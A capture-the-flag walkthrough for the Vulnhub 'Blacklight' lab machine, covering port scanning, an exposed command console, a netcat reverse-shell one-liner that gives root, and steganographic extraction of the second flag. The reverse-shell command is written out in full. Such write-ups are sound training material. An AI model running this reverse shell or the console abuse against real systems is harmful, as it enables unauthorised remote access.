Blacklight Walkthrough

Description

This box can also be found on vulnhub.com. There is no proper description, but I can say that the machine is good for newbies, who want to learn.
Link: Blacklight on Vulnhub

Port scanning

The usual nmap scan returned the following:

root@kali:~# nmap -A -p- 192.168.43.246
Nmap scan report for blacklight (192.168.43.246)
Host is up (0.00020s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
9072/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
|_    BLACKLIGHT console mk1. Type .help for instructions
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at [https://nmap.org/cgi-bin/submit.cgi?new-service](https://nmap.org/cgi-bin/submit.cgi?new-service) :
SF-Port9072-TCP:V=7.70%I=7%D=8/15%Time=5B7442E6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr
SF:uctions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x
SF:20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20cons
SF:ole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(HTTPOptions
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(RTSPRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\
SF:.help\x20for\x20instructions\n")%r(RPCCheck,34,"BLACKLIGHT\x20console\x
SF:20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(DNSVersionBindRe
SF:qTCP,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20ins
SF:tructions\n")%r(DNSStatusRequestTCP,34,"BLACKLIGHT\x20console\x20mk1\.\
SF:x20Type\x20\.help\x20for\x20instructions\n")%r(Help,34,"BLACKLIGHT\x20c
SF:onsole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SSLSessi
SF:onReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20in
SF:structions\n")%r(TLSSessionReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Ty
SF:pe\x20\.help\x20for\x20instructions\n")%r(Kerberos,34,"BLACKLIGHT\x20co
SF:nsole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SMBProgNe
SF:g,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instru
SF:ctions\n")%r(X11Probe,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.h
SF:elp\x20for\x20instructions\n")%r(FourOhFourRequest,34,"BLACKLIGHT\x20co
SF:nsole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(LPDString
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(LDAPSearchReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x2
SF:0\.help\x20for\x20instructions\n")%r(LDAPBindReq,34,"BLACKLIGHT\x20cons
SF:ole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SIPOptions,
SF:34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruct
SF:ions\n")%r(LANDesk-RC,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.h
SF:elp\x20for\x20instructions\n")%r(TerminalServer,34,"BLACKLIGHT\x20conso
SF:le\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(NCP,34,"BLAC
SF:KLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n");
MAC Address: 08:00:27:44:1E:0A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms blacklight (192.168.43.246)

The first flag

I started with the web server on port 80. There was nothing particularly interesting on the server except the robots.txt file, which revealed the first flag.

{flag1:fc4c7223964a26b152823d14f129687207e7fe15}

There was also a blacklight.dict file, but at this point, it was not useful. I went back to check out port 9072 with netcat:

root@kali:~# nc 192.168.43.246 9072
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
.readhash
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
You have one more command until the server shuts down. Choose wisely!

Getting root access

I chose the easy way, but it got me nowhere. I tried to execute a command, but since the output was not displayed, I couldn’t make use of it. Then, I tried executing different reverse shells from pentestmonkey’s website.
The second netcat command was the winner:

.exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.5 443 >/tmp/f

Before executing the above command, I obviously set up a listener:

root@kali:~# nc -lp 443
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty; pty.spawn("/bin/bash")'
root@blacklight:~#

As you can see, I used python to upgrade to a pseudo-terminal and the shell had root privileges, which was awesome. I took the hint from the first flag and started searching in the home folder of the user blacklight.

root@blacklight:/home/blacklight# ls -la
total 48
drwxr-xr-x 6 blacklight blacklight 4096 Jun  7 23:49 .
drwxr-xr-x 3 root       root       4096 Jun  7 21:01 ..
-rw------- 1 blacklight blacklight 1019 Jun  8 00:24 .bash_history
-rw-r--r-- 1 blacklight blacklight  220 Apr  4 18:30 .bash_logout
-rw-r--r-- 1 blacklight blacklight 3771 Apr  4 18:30 .bashrc
drwx------ 2 blacklight blacklight 4096 Jun  7 21:01 .cache
-rwxrwxr-x 1 blacklight blacklight 1019 Jun  7 23:49 console.rb
drwx------ 3 blacklight blacklight 4096 Jun  7 21:01 .gnupg
-rw-r--r-- 1 root       root         65 Jun  7 21:56 hash.txt
drwxrwxr-x 3 blacklight blacklight 4096 Jun  7 22:27 .local
-rw-r--r-- 1 blacklight blacklight  666 Jun  7 21:27 .profile
drwxr-xr-x 2 root       root       4096 Jun  7 22:14 .secret
-rw-r--r-- 1 blacklight blacklight    0 Jun  7 21:01 .sudo_as_admin_successful
root@blacklight:/home/blacklight# cd .secret
cd .secret
root@blacklight:/home/blacklight/.secret# ls -la
total 28
drwxr-xr-x 2 root       root        4096 Jun  7 22:14 .
drwxr-xr-x 6 blacklight blacklight  4096 Jun  7 23:49 ..
-rw-r--r-- 1 root       root       19080 Jun  7 22:13 flag2-inside.jpg

The second flag

I found a picture in a hidden directory,
which I moved to the web server directory …

root@blacklight:/home/blacklight/.secret# cd /var/www/html
root@blacklight:/var/www/html# ls
404.html         css        flag2-inside.jpg  footer  index.html  robots.txt
blacklight.dict  flag1.txt  fonts             img     js
root@blacklight:/var/www/html#

and downloaded it:

root@kali:~/Downloads# wget 192.168.43.246/flag2-inside.jpg
[http://192.168.43.246/flag2-inside.jpg](http://192.168.43.246/flag2-inside.jpg)
Connecting to 192.168.43.246:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19080 (19K) [image/jpeg]
Saving to: ‘flag2-inside.jpg’

flag2-inside.jpg      100%[========================>]  18.63K  --.-KB/s    in 0s

(492 MB/s) - ‘flag2-inside.jpg’ saved [19080/19080]

flag2-inside.jpg

I forgot to mention that I saw some commands in the .bash_history file related to how this flag was constructed by the creator. Alright, the hint was pretty clear. I installed the outguess program and used the -r switch to retrieve the message and supplied the image and an output file called flag2.txt.

root@kali:~/Downloads# outguess -r flag2-inside.jpg flag2.txt
Reading flag2-inside.jpg....
Extracting usable bits:   18496 bits
Steg retrieve: seed: 180, len: 133

The final flag was:

{flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4}

Before you go

If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!